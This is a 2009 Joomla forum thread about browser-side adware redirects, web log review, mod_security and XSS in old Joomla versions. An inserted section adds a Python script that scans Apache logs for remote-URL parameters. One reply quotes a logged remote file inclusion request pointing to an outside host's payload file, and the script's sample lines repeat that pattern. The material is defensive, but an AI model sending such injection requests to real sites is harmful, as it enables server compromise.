Malware/Adware/Spyware Browser Redirects and Content Injects

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

ledneonflex
Joomla! Apprentice
Posts: 19
Joined: Fri Jan 26, 2007 4:08 am

Malware/Adware/Spyware Browser Redirects and Content Injects

Post by ledneonflex » Fri Jul 31, 2009 5:47 pm

Hi,

What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?

We have found PCs in the past that redirect our site to a competitor's using the browser and have also found content such as contact details and phone numbers being replaced by competitors.

Any information to help determine this fact would be greatly appreciated. Most often this form of marketing goes by without the site admin's detection since it's not server side.

Thanks

Derek

GarfieldLeChat
Joomla! Enthusiast
Posts: 166
Joined: Fri Sep 16, 2005 9:59 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by GarfieldLeChat » Sun Aug 02, 2009 7:27 pm

Is it a Joomla-based site?

Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.

Oh, and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.

ledneonflex
Joomla! Apprentice
Posts: 19
Joined: Fri Jan 26, 2007 4:08 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by ledneonflex » Sun Aug 02, 2009 7:33 pm

GarfieldLeChat wrote:
> Is it a Joomla-based site?
>
> Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
>
> Oh, and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.

It's not server-side related, it's the user's browser with malicious adware/spyware installed. I'm asking if anyone knows of a way to test for this kind of activity.

Thank you for the feedback though.

GarfieldLeChat
Joomla! Enthusiast
Posts: 166
Joined: Fri Sep 16, 2005 9:59 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by GarfieldLeChat » Wed Aug 05, 2009 5:24 am

ledneonflex wrote:
> GarfieldLeChat wrote:
> > Is it a Joomla-based site?
> >
> > Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
> >
> > Oh, and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.
>
> It's not server-side related, it's the user's browser with malicious adware/spyware installed. I'm asking if anyone knows of a way to test for this kind of activity.
>
> Thank you for the feedback though.

Sorry, still don't get what you're driving at; this is a Joomla help and community forum.

Are you asking is it possible to hijack a browser via malicious code? In which case the answer's yes. If you are asking if it's possible to tell which browsers come to your site using malicious code, then possibly, but you'd need to pay someone to do it, and it would entirely depend on what you were looking for vs. the cost of having something bespoke programmed.

But this isn't really what these forums are for unless it's Joomla related.

ledneonflex
Joomla! Apprentice
Posts: 19
Joined: Fri Jan 26, 2007 4:08 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by ledneonflex » Wed Aug 05, 2009 1:14 pm

GarfieldLeChat wrote:
> ledneonflex wrote:
> > GarfieldLeChat wrote:
> > > Is it a Joomla-based site?
> > >
> > > Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
> > >
> > > Oh, and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.
> >
> > It's not server-side related, it's the user's browser with malicious adware/spyware installed. I'm asking if anyone knows of a way to test for this kind of activity.
> >
> > Thank you for the feedback though.
>
> Sorry, still don't get what you're driving at; this is a Joomla help and community forum.
>
> Are you asking is it possible to hijack a browser via malicious code? In which case the answer's yes. If you are asking if it's possible to tell which browsers come to your site using malicious code, then possibly, but you'd need to pay someone to do it, and it would entirely depend on what you were looking for vs. the cost of having something bespoke programmed.
>
> But this isn't really what these forums are for unless it's Joomla related.

I understand this. I'm asking if anyone knows of any tools that can test if adware/malware/spyware etc. is targeting your site, whether it's Joomla or not. Reason I ask in this forum is that the knowledge here is greater than most other forums and more subscribers.

Thank you for the feedback!

dynamicnet
Joomla! Guru
Posts: 577
Joined: Wed Aug 05, 2009 1:42 pm

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by dynamicnet » Wed Aug 05, 2009 2:42 pm

Greetings:

* Do make sure you've followed the security checklist for your Joomla installation.

* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.

* Do review your web site logs.

In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.

An example of what you might see for an injection is as follows:

"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"

* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not foolproof, and your provider may have to go through some fine tuning to remove false positives.

Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
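
The log review recommended in the post above can be partly automated. The following is an added example, not code from any poster in this thread: a Python scan of Apache combined-format access lines for request parameters whose value is a URL to a foreign host, the pattern visible in the logged request above. The log lines, IP addresses, hostnames and the `own_hosts` allowlist are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A request parameter whose value begins with a remote URL scheme.
REMOTE_PARAM_RE = re.compile(
    r'[?&]([A-Za-z0-9_\[\]]+)=((?:https?|ftp)://[^&\s]+)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges and example domains).
SAMPLE_LOG = '''\
192.0.2.10 - - [05/Aug/2009:14:01:22 +0000] "GET /index.php?option=com_content&id=572 HTTP/1.1" 200 18230 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Aug/2009:14:02:03 +0000] "GET /index.php?option=com_content&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://remote.example/x.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805"
198.51.100.7 - - [05/Aug/2009:14:02:09 +0000] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.10 - - [05/Aug/2009:14:05:10 +0000] "GET /index.php?option=com_user&return=http://www.example.org/members HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''.splitlines()

def find_remote_includes(lines, own_hosts=()):
    """Return one record per parameter that carries a URL to a foreign host."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format access line
        # Decode twice so URL-encoded and double-encoded values are also seen.
        target = unquote(unquote(m.group("target")))
        for name, value in REMOTE_PARAM_RE.findall(target):
            url = value.rstrip("?")  # drop trailing '?' as in the post's sample
            try:
                host = (urlsplit(url).hostname or "").lower()
            except ValueError:  # malformed authority in attacker-supplied data
                host = ""
            if host in own:
                continue  # e.g. a legitimate return/redirect parameter
            hits.append({"ip": m.group("ip"), "time": m.group("time"),
                         "status": int(m.group("status")), "param": name,
                         "url": url, "agent": m.group("agent")})
    return hits

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG, own_hosts={"www.example.org"}):
        print(hit["time"], hit["ip"], hit["status"], hit["param"], hit["url"])
```

The status code in each record shows only how the server answered the request; a 200 on a flagged line is a reason to inspect the named script and the site's files, not proof of compromise.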

GarfieldLeChat
Joomla! Enthusiast
Posts: 166
Joined: Fri Sep 16, 2005 9:59 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by GarfieldLeChat » Mon Aug 10, 2009 4:05 am

dynamicnet wrote:
> Greetings:
>
> * Do make sure you've followed the security checklist for your Joomla installation.
>
> * Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.
>
> * Do review your web site logs.
>
> In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.
>
> An example of what you might see for an injection is as follows:
>
> "GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"
>
> * Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not foolproof, and your provider may have to go through some fine tuning to remove false positives.
>
> Thank you.

See, all of this is generic advice which isn't actually what they appear to be asking, which seems to be, if I've got this right, can a site owner tell which infected browsers from a machine or set of machines are visiting their site...

And the answer is specialist bespoke programming, not generalised advice, I'm afraid.

If your site is being hit with big old attacks focused from a particular source or sources then it's unlikely that the browser the user is using will affect your machine unless it's being used to directly launch attacks as part of a wider campaign (i.e. zombie machine). You'll then get an IP address in your log files of that machine and in effect a browser code; however, you'd be hard pressed to tell which is which without some kind of interpretation and even hard pressed to prove that a user going to your site with malicious code in their browser was doing so knowingly... proving intent will be the downfall...

dynamicnet
Joomla! Guru
Posts: 577
Joined: Wed Aug 05, 2009 1:42 pm

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by dynamicnet » Mon Aug 10, 2009 2:19 pm

Greetings:

I believe my answer dealt specifically with "What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?" which is to review the web site logs and that will tell if attacks are incoming.

It is possible I misunderstood the question, and then the answer, of course, would be different.

Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.

ledneonflex
Joomla! Apprentice
Posts: 19
Joined: Fri Jan 26, 2007 4:08 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by ledneonflex » Sun Aug 16, 2009 2:35 am

http://en.wikipedia.org/wiki/Cross-site_scripting

Is Joomla 1.0.13 vulnerable to XSS?

dynamicnet
Joomla! Guru
Joomla! Guru
Posts: 577
Joined: Wed Aug 05, 2009 1:42 pm

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by dynamicnet » Sun Aug 16, 2009 12:30 pm

Greetings:

If you are not on the current version, then you are vulnerable.

Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.

ledneonflex
Joomla! Apprentice
Posts: 19
Joined: Fri Jan 26, 2007 4:08 am

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by ledneonflex » Mon Aug 17, 2009 3:38 am

Hi. Yah, it's slightly out of date. We are in the process of upgrading to 1.5; template is done and revised. Just porting over content and cleaning up the old site and making navigation much better as the old site is horrible.

Should be done soon. Is 1.5 vulnerable to XSS? Anyone hear of any issues?

Thanks for all the feedback on this issue. Joomla forums are and always have been my favorite source of information regarding almost anything web related.

dynamicnet
Joomla! Guru
Joomla! Guru
Posts: 577
Joined: Wed Aug 05, 2009 1:42 pm

Re: Malware/Adware/Spyware Browser Redirects and Content Injects

Post by dynamicnet » Mon Aug 17, 2009 3:25 pm

Greetings:

The latest release is clean for XSS attacks as far as I know... but if your security administrator installs mod_security on the server that will help as well.

Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.

